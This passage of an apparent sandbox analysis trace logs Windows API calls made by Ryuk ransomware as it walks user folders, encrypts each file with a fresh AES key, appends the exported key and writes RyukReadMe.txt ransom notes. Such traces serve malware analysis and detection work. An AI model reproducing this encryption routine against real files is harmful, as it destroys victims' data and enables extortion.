nNumberOfBytesToWrite=0x10340, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10340, lpOverlapped=0x0) returned 1 [0158.315] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0158.315] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.315] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.315] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0158.315] CloseHandle (hObject=0x18c) returned 1 [0158.330] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.334] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.334] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.334] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0158.334] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0158.335] SetLastError (dwErrCode=0x0) [0158.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0158.335] GetLastError () returned 0xb7 [0158.335] CloseHandle (hObject=0x188) returned 1 [0158.335] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.335] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.335] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\q-yI-zfhTcQZ6ZOpf.bmp", dwFileAttributes=0x80) returned 1 [0158.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\q-yI-zfhTcQZ6ZOpf.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\q-yi-zfhtcqz6zopf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0158.335] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=33498) returned 1 [0158.335] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=33498) returned 1 [0158.335] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x81b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.335] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0158.336] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.336] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0158.336] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.336] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.336] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x82da, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x82da, lpOverlapped=0x0) returned 1 [0158.337] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0158.337] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x82da, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x82e0) returned 1 [0158.337] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.337] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x82e0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x82e0, lpOverlapped=0x0) returned 1 [0158.337] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0158.337] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.337] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.338] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0158.338] CloseHandle (hObject=0x188) returned 1 [0158.353] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.357] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.357] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.357] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.357] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.357] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.357] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wdj0DfFH ekwzY.bmp", dwFileAttributes=0x80) returned 1 [0158.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wdj0DfFH ekwzY.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wdj0dffh ekwzy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0158.358] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=57822) returned 1 [0158.358] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=57822) returned 1 [0158.358] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xe0bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.358] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0158.359] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.359] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0158.359] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.359] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.359] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xe1de, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xe1de, lpOverlapped=0x0) returned 1 [0158.360] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0158.360] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xe1de, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xe1e0) returned 1 [0158.360] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.360] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe1e0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xe1e0, lpOverlapped=0x0) returned 1 [0158.361] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0158.361] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.361] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.361] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0158.361] CloseHandle (hObject=0x188) returned 1 [0158.376] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.380] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.380] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.380] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.380] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.380] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xJsIhD.bmp", dwFileAttributes=0x80) returned 1 [0158.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xJsIhD.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xjsihd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0158.381] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=81109) returned 1 [0158.381] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=81109) returned 1 [0158.381] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x13bb3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.381] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0158.381] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.381] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0158.382] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.382] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.382] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x13cd5, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x13cd5, lpOverlapped=0x0) returned 1 [0158.383] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0158.383] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x13cd5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x13ce0) returned 1 [0158.383] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.383] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13ce0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x13ce0, lpOverlapped=0x0) returned 1 [0158.384] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0158.384] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.384] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.384] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0158.384] CloseHandle (hObject=0x188) returned 1 [0158.399] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.403] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.403] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.403] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0158.403] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0158.403] SetLastError (dwErrCode=0x0) [0158.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.403] GetLastError () returned 0xb7 [0158.403] CloseHandle (hObject=0x184) returned 1 [0158.403] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0158.403] SetLastError (dwErrCode=0x0) [0158.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.404] GetLastError () returned 0xb7 [0158.404] CloseHandle (hObject=0x184) returned 1 [0158.404] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0158.404] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0158.404] SetLastError (dwErrCode=0x0) [0158.404] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.404] GetLastError () returned 0x0 [0158.404] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0158.405] CloseHandle (hObject=0x184) returned 1 [0158.405] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0158.405] SetLastError (dwErrCode=0x0) [0158.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.405] GetLastError () returned 0xb7 [0158.405] CloseHandle (hObject=0x184) returned 1 [0158.405] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0158.406] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0158.406] SetLastError (dwErrCode=0x0) [0158.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.406] GetLastError () returned 0x0 [0158.406] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0158.407] CloseHandle (hObject=0x184) returned 1 [0158.407] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0158.407] SetLastError (dwErrCode=0x0) [0158.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.407] GetLastError () returned 0xb7 [0158.407] CloseHandle (hObject=0x184) returned 1 [0158.407] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0158.407] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.407] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.407] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0158.407] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0158.407] SetLastError (dwErrCode=0x0) [0158.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.408] GetLastError () returned 0x0 [0158.408] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0158.409] CloseHandle (hObject=0x184) returned 1 [0158.409] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0158.409] SetLastError (dwErrCode=0x0) [0158.409] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.409] GetLastError () returned 0xb7 [0158.409] CloseHandle (hObject=0x184) returned 1 [0158.409] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0158.409] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.409] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.409] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.409] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.409] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", dwFileAttributes=0x80) returned 1 [0158.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0158.410] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=248) returned 1 [0158.410] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=248) returned 1 [0158.410] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0158.410] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.410] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.410] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf8, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xf8, lpOverlapped=0x0) returned 1 [0158.411] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0158.411] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xf8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x100) returned 1 [0158.411] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.411] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x100, lpOverlapped=0x0) returned 1 [0158.411] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0158.411] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.411] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.411] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0158.411] CloseHandle (hObject=0x188) returned 1 [0158.437] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.441] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.441] VirtualFree (lpAddress=0x110000, 